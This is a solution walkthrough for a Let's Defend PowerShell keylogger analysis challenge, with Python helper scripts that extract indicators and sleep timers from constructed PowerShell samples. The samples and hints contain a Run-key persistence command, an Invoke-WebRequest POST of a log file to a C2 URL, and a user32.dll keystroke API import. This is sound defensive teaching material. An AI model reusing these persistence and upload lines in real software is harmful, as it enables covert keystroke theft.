PowerShell Keylogger
Let's Defend Malware Analysis [Easy]


#tutorial

Challenge Description

[Challenge description image]

Solution and Analysis

This guide provides a structured approach to analyzing the malware script and finding the answers to the provided questions. Each section details the methodology for locating the relevant information within the code.


Question 1: What is the proxy port used by the script?

  • Methodology: Configuration settings like IP addresses, ports, or domains are often declared as variables at the beginning of a script for easy modification. Look for a variable assignment that clearly defines a port number for a proxy connection.
  • Location: As indicated, check near line 5.
  • Expected Answer: A numerical value (e.g., 8080, 4444) assigned to a variable like $proxyPort or PROXY_PORT.

Question 2: What function/method is used for starting keylogging?

  • Methodology: The script will have a specific function or method call that initiates the keylogging thread or loop. Search for function definitions or calls with names related to logging, capturing keys, or starting a hook.
  • Location: Check the code around line 81.
  • Expected Answer: The name of the function or method being invoked, such as Start-Keylogger, begin_logging(), or a similar identifier.

Question 3: What is the name of the file used by the script to store the keylog data?

  • Methodology: Keystrokes are typically logged to a temporary file on the victim's machine before being exfiltrated. Find the part of the code that handles file I/O (writing to a file) and identify the variable holding the filename.
  • Location: Examine the logic near line 134.
  • Expected Answer: A filename string defined in the code, for example, "log.txt", "%TEMP%\dat.tmp", or "keystrokes.log".

Question 4: What command is used by the script to achieve persistence?

  • Methodology: Persistence allows malware to survive a system reboot. Common techniques in Windows include creating a Run key in the registry, a scheduled task, or placing a file in the Startup folder. Look for commands that interact with the Windows Registry (reg add, Set-ItemProperty) or the Task Scheduler (schtasks).
  • Location: The persistence mechanism can be found near line 245.
  • Expected Answer: The full command line used to establish persistence, such as reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "...".

Question 5: What is the command used by the script to upload data?

  • Methodology: Data exfiltration is the process of sending collected data (like keylogs) to a command-and-control (C2) server. Look for functions or commands related to making network requests, such as Invoke-WebRequest, Start-BitsTransfer, or methods from a networking library.
  • Location: The data upload logic is located around line 215.
  • Expected Answer: The function or command used for the network transfer, like Invoke-WebRequest -Uri $c2_url -Method POST -InFile $log_file.

Question 6: What is the regex used by the script to filter IP addresses?

  • Methodology: To find a specific pattern in text, scripts use Regular Expressions (Regex). Search the code for a string that matches the typical format of an IP address regex pattern. Common indicators include \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} or keywords like -match, re.compile, or Regex.
  • Location: This may not have a fixed line number. Search the entire script for patterns resembling an IP address format.
  • Expected Answer: The regex pattern string itself, for example: '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'.

Question 7 & 9: What is the DLL imported by the script to call keylogging APIs?

  • Methodology: High-level scripts (like PowerShell or Python) often need to call low-level Windows API functions to perform actions like keylogging. These functions live in system DLLs. Look for code that imports or loads a DLL, particularly one related to user input. user32.dll is the most common choice for this purpose, as it exports functions like GetAsyncKeyState and GetForegroundWindow.
  • Location: The DLL import statement can be found around line 99.
  • Expected Answer: The name of the DLL file, which is most likely "user32.dll".
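The lookups in Questions 1 to 7 and 9 are all "find the line that matches a pattern" tasks, so a first pass can be automated. The Python script below is an added example (it is not part of this walkthrough and not Let's Defend's material); it runs a set of heuristic regexes over a constructed PowerShell fragment, which is not the challenge file, and reports each hit with its line number so the result can be compared against the line hints above. The sample values, `$c2Url`, `$launcher` and the `Start-Keylogger` function name are all invented for the fixture.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: configuration-shaped fragments of the kind the
# walkthrough describes (proxy settings, log path, DLL import, IP regex,
# Run-key persistence, upload call). It is NOT the challenge script and does
# not function as a keylogger; $c2Url and $launcher are placeholder names.
SAMPLE_SCRIPT = r'''
$proxyHost = "proxy.example.internal"
$proxyPort = 8080
$logFile = "$env:TEMP\dat.tmp"
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern short GetAsyncKeyState(int vKey);' -Name KB -Namespace Win32
function Start-Keylogger {
    # body omitted from this constructed sample
}
if ($reply -match '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b') { $ip = $Matches[0] }
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "$launcher"
Invoke-WebRequest -Uri $c2Url -Method POST -InFile $logFile
'''

# One or more heuristic regexes per category. Each pattern has exactly one
# capture group: the value reported to the analyst.
INDICATOR_PATTERNS: Dict[str, List[str]] = {
    # Q1: a numeric assignment to a variable whose name contains "port"
    "proxy_port": [r"\$\w*port\w*\s*=\s*(\d{1,5})\b"],
    # Q2: function definitions whose name hints at key capture or hooking
    "keylog_function": [r"function\s+([\w-]*(?:key|hook|log)[\w-]*)"],
    # Q3: a quoted path assigned to a log/file/output variable
    "log_file": [r"\$\w*(?:log|file|out)\w*\s*=\s*\"([^\"\n]+)\""],
    # Q4: Run-key or scheduled-task persistence
    "persistence": [
        r"(reg(?:\.exe)?\s+add\s+[^\n]*\\Run\b[^\n]*)",
        r"(Set-ItemProperty[^\n]*\\Run\b[^\n]*)",
        r"(schtasks(?:\.exe)?\s+/create[^\n]*)",
    ],
    # Q5: outbound transfer cmdlets
    "upload": [r"((?:Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer)\b[^\n]*)"],
    # Q6: a single-quoted literal containing the four-octet \d{1,3} pattern
    "ip_regex": [r"'([^'\n]*\\d\{1,3\}(?:\\\.\\d\{1,3\}){3}[^'\n]*)'"],
    # Q7/Q9: DLLs pulled in through P/Invoke declarations
    "dll_import": [r"DllImport\(\"([^\"\n]+\.dll)\""],
}


def extract_indicators(script: str) -> Dict[str, List[Tuple[int, str]]]:
    """Return {category: [(line_number, value), ...]} for every pattern hit."""
    found: Dict[str, List[Tuple[int, str]]] = {}
    for category, patterns in INDICATOR_PATTERNS.items():
        hits: List[Tuple[int, str]] = []
        for pattern in patterns:
            for m in re.finditer(pattern, script, re.IGNORECASE):
                # 1-based line number of the captured value, to compare
                # with the "Location" hints in the walkthrough
                line_no = script.count("\n", 0, m.start(1)) + 1
                hits.append((line_no, m.group(1).strip()))
        if hits:
            found[category] = sorted(hits)
    return found


def summarize(script: str) -> List[str]:
    """Human-readable triage lines, one per hit, grouped by category."""
    lines: List[str] = []
    for category, hits in extract_indicators(script).items():
        for line_no, value in hits:
            lines.append(f"{category:16} line {line_no:>3}: {value}")
    return lines


if __name__ == "__main__":
    # For a real file: extract_indicators(open(path, encoding="utf-8-sig").read())
    for row in summarize(SAMPLE_SCRIPT):
        print(row)
```

The heuristics are deliberately loose (any variable name containing "port", any single-quoted literal shaped like a four-octet regex) because their job is to point at candidate lines for the analyst to read, not to replace reading the code. They miss values that are built at runtime from concatenated or encoded strings, which is exactly the case where the manual line-by-line approach in the questions above is still needed.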

Question 8: How many seconds does the script wait before re-establishing a connection?

  • Methodology: This refers to the standard delay or "sleep" interval within the main communication loop of the malware. This is done to reduce network noise and CPU usage. Look for a Start-Sleep, sleep(), or Task.Delay command inside the primary loop that communicates with the C2 server.
  • Location: This timer is set near line 86.
  • Expected Answer: A numerical value representing the sleep time in seconds (e.g., 60, 300).

Question 10: How many seconds does the script wait after failing to establish a connection?

  • Methodology: This is different from the standard loop timer. It's an error-handling feature. When a connection to the C2 server fails, the script will wait a specific amount of time before trying again. Look for a Start-Sleep or equivalent command inside a catch or except block that handles network connection errors.
  • Location: This specific error-handling timer is located at line 276.
  • Expected Answer: A numerical value representing the sleep time in seconds after a connection failure.
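Questions 8 and 10 both ask for a Start-Sleep value, and the only thing that separates them is where the call sits: inside the beacon loop, or inside the catch block that handles a failed connection. A plain text search returns both without that context. The Python script below is an added example (not from this walkthrough or from Let's Defend); it tracks brace nesting in a constructed PowerShell loop, records the enclosing blocks for every Start-Sleep, resolves an argument given as a literal variable, and normalises -Milliseconds to seconds. `Open-Channel` and `Send-Beacon` are placeholder names invented for the fixture.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the shape of a beacon loop (not the challenge file and
# not a working implant): a polling sleep in the main loop and a separate
# retry sleep in the catch block. Open-Channel and Send-Beacon are invented.
SAMPLE_LOOP = r'''
$retryDelay = 30
while ($true) {
    try {
        $session = Open-Channel $c2Host $c2Port
        Send-Beacon $session
        Start-Sleep -Seconds 60
    }
    catch {
        Write-Verbose "connect failed"; Start-Sleep -s $retryDelay
    }
}
Start-Sleep -Milliseconds 500
'''

BLOCK_KEYWORDS = ("try", "catch", "finally", "while", "foreach", "for", "do",
                  "if", "elseif", "else", "function")
LOOP_KEYWORDS = {"while", "foreach", "for", "do"}
KEYWORD_RE = re.compile(r"\b(" + "|".join(BLOCK_KEYWORDS) + r")\b", re.IGNORECASE)
# Positional or -Seconds/-s value, or -Milliseconds/-ms; literal or $variable
SLEEP_RE = re.compile(
    r"Start-Sleep\s+(?:-(?P<unit>Sec\w*|Mill\w*|ms|s)\s+)?(?P<val>\$?[\w.]+)",
    re.IGNORECASE)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(\d+(?:\.\d+)?)\b")


@dataclass
class SleepCall:
    line: int
    seconds: Optional[float]          # None when the value is computed at runtime
    context: List[str] = field(default_factory=list)  # enclosing blocks, outermost first

    def role(self) -> str:
        # A catch block wins even when it is nested inside the loop (Q10).
        if "catch" in self.context:
            return "retry delay after a failed connection (catch block)"
        if any(k in LOOP_KEYWORDS for k in self.context):
            return "polling interval inside the main loop"
        return "one-off delay outside any loop"


def _to_seconds(m: "re.Match[str]", literals: Dict[str, float]) -> Optional[float]:
    raw = m.group("val")
    if raw.startswith("$"):
        value = literals.get(raw[1:].lower())
        if value is None:
            return None
    else:
        try:
            value = float(raw)
        except ValueError:
            return None
    unit = (m.group("unit") or "s").lower()
    return value / 1000 if unit.startswith("m") else value


def find_sleeps(script: str) -> List[SleepCall]:
    """Locate every Start-Sleep and record the block structure around it."""
    # Literal numeric assignments let us resolve "Start-Sleep $retryDelay".
    literals = {name.lower(): float(v) for name, v in ASSIGN_RE.findall(script)}
    stack: List[str] = []
    seg_start = 0        # start of the text that may name the next "{" block
    calls: List[SleepCall] = []
    for idx, ch in enumerate(script):
        if ch == "{":
            # The last block keyword before the brace labels this block;
            # "block" covers script blocks and hashtables without a keyword.
            words = KEYWORD_RE.findall(script[seg_start:idx])
            stack.append(words[-1].lower() if words else "block")
            seg_start = idx + 1
        elif ch == "}":
            if stack:
                stack.pop()
            seg_start = idx + 1
        elif ch in "Ss" and script[idx:idx + 11].lower() == "start-sleep":
            m = SLEEP_RE.match(script, idx)
            if m:
                line_no = script.count("\n", 0, idx) + 1
                calls.append(SleepCall(line_no, _to_seconds(m, literals), list(stack)))
    return calls


if __name__ == "__main__":
    for call in find_sleeps(SAMPLE_LOOP):
        print(f"line {call.line}: {call.seconds} s, in {'/'.join(call.context) or 'top level'} "
              f"-> {call.role()}")
```

The brace tracker is a heuristic, not a PowerShell parser: a `{` inside a string literal or a here-string will throw the nesting off, so treat its output as a guide to which lines to read rather than as ground truth. The distinction it draws is the one the two questions rely on: the same cmdlet with a different meaning depending on whether it follows a successful beacon or a caught connection error.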